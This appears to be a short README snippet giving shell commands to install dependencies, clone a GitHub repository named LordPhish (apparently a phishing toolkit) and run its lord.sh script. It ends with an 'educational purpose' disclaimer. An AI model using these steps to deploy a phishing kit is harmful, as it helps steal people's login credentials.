apt-get update -y
apt-get install php -y
apt-get install openssh -y
apt-get install wget -y
apt-get install git -y
git clone https://github.com/grenoxx/LordPhish.git
cd LordPhish
bash lord.sh
Aurthor assumes that the users would use lordphish legally. Aurthor won't be responsible in case of any damage caused by any user using this source code. This code is open sourced for educational purpose.